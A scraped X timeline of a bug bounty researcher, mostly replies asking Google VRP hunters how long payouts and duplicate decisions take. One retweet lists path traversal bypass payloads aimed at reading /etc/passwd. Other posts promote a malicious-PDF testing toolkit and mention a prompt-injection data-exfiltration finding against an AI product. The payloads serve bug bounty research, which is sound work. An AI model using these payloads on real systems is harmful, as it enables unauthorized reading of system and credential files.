Tank0

58 posts

Tank0

Tank0

@XTank0

Security Researcher

가입일 Mayıs 2020
142 팔로잉12 팔로워
Tank0 리트윗함
BRute Logic
BRute Logic@BRuteLogic·
Path Traversal Bypasses Null Byte Injection ../../../etc/./passwd%00.png Stripped Dot-Dot-Slash ..././..././..././e../tc..//pas../swd Multi-Stage Decoding ..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32Fpasswd Truncation Appending (4096 bytes) ../../../etc/./passwd/././././././
English
0
65
430
14.4K
Tank0
Tank0@XTank0·
@japzdivino Congrats, how long it took from submission to acceptance?
English
1
0
1
302
Tank0
Tank0@XTank0·
@where_secrets @GoogleVRP Best of luck next time, may i ask you how long it took from submission to getting this duplicate response
English
1
0
1
65
Andrew
Andrew@where_secrets·
This feels like a fever dream. I reported a Google security vulnerability related to Gemini to @GoogleVRP, and they confirmed it’s real. I’m so proud of myself. Though it’s something small, my younger self would never believe I’d be able to do something like this. God is good
Andrew tweet media
English
1
0
0
78
Tank0
Tank0@XTank0·
@mOhamedd7w Congrats, how long it took from submission to bounty
English
1
0
0
130
Tank0
Tank0@XTank0·
@adilburaksen How long do they usually take from submission to bounty? Have you experienced ai vrp before
English
0
0
0
28
Adil Burak
Adil Burak@adilburaksen·
A few weeks ago I was trying to get my first report accepted on Google VRP. Today I'm at 5 accepted reports, with 2 already fixed. Still a lot to learn, but it's nice to see the process working. #GoogleVRP #BugBounty #AppSec
English
11
2
77
3.6K
Tank0
Tank0@XTank0·
@ott3rly Congrats How long it took them from submission to bounty ?
English
1
0
0
289
Mantas Sabeckis
Mantas Sabeckis@ott3rly·
Feels good when its not expected much
Mantas Sabeckis tweet media
English
11
5
271
9.6K
Tank0
Tank0@XTank0·
@hasanfleyah Congratulations, how long did it take from submission to bounty ?
English
0
0
0
6
HASAN FLAYYIH ABDULLAH
HASAN FLAYYIH ABDULLAH@hasanfleyah·
I am happy to share that I received a $9,500 reward from the Google AI VRP for discovering a sensitive Data Exfiltration vulnerability in NotebookLM. ​I identified a way to bypass context isolation using an Indirect Prompt Injection which could leak private PII/SPII #GoogleVRP
HASAN FLAYYIH ABDULLAH tweet media
English
1
0
8
440
Tank0
Tank0@XTank0·
@hasanfleyah And also since you have experienced ai vrp do they take alot of time or how much in average?
English
0
0
0
129
Tank0
Tank0@XTank0·
@hasanfleyah Congratulations How long they took from submission to bounty?
English
0
0
0
105
Tank0 리트윗함
Vivek | Cybersecurity
Vivek | Cybersecurity@VivekIntel·
☠️ Malicious PDF Generator: A PDF Security Testing Toolkit for Pentesters and Bug Bounty Hunters Generate 70+ PDF security test files to assess PDF viewers, converters, and document processing pipelines for SSRF, XXE, callback behavior, data exfiltration risks, and other security weaknesses during authorized testing. 🔗 github.com/jonaslejon/mal… #cybersecurity #pentesting #bugbounty #RedTeam #AppSec #PDFSecurity #WebSecurity #opensource
Vivek | Cybersecurity tweet media
English
5
240
1.3K
43.8K
Spandan Pokhrel
Spandan Pokhrel@Spandan0x50·
Can't disclose the bug, but this led to a Google account compromise. I’ve been active in the Google VRP for quite some time, climbed up to the top 150 globally, and it’s definitely not easy to impress the VRP panel with a report. Worth the hunt🎉 @GoogleVRP #bugbounty
Spandan Pokhrel tweet media
English
6
0
88
7.2K
Tank0
Tank0@XTank0·
@sin99xx Congrats man, is it ai product ?
English
0
0
1
53
sin99xx
sin99xx@sin99xx·
;)
sin99xx tweet media
ZXX
7
1
65
2.3K
Tank0
Tank0@XTank0·
@_xeloxa @Hacker0x01 Always check the status of the report you got duplication for Because sometimes you will find the report has been closed as N/A Happened to me
English
1
0
1
31
Ali Sünbül
Ali Sünbül@_xeloxa·
ughhh another one of those super annoying things just happened DUPLICATE i just hope BBP didnt do something shady in the background coz honestly lots of people have been getting screwed over by BBP lately
Ali Sünbül tweet media
English
4
0
34
1.8K
Tank0
Tank0@XTank0·
@JubaBaghdad How long they take to mark the report as a duplicate ? Is it fast or take a month or so then deciding that this is a duplicate
English
0
0
0
3
Tank0
Tank0@XTank0·
@_MrPlanB And how long did it takes from submitting till they told you it's a duplicate? Because someone before had an accepted one for two month then they told him it's a dup. So I'm asking if they also took a while with you before closing as a dup
English
1
0
1
39
s0rte
s0rte@_MrPlanB·
🙃
s0rte tweet media
QME
3
0
12
1.1K
Serag Aboushady
Serag Aboushady@seragaboushady·
@Google Gemini team: We’ve discovered a critical functional bug affecting enterprise users in the Middle East. We have a documented PoC. Please provide a direct channel or VRP contact for secure reporting and resolution. #CyberSecurity #TechFounder
English
1
0
0
53
Tank0
Tank0@XTank0·
@nnwakelam Congratulations, is it Ai VRP ?
Français
0
0
0
636
Nate
Nate@nnwakelam·
Nate tweet media
ZXX
7
0
216
13.3K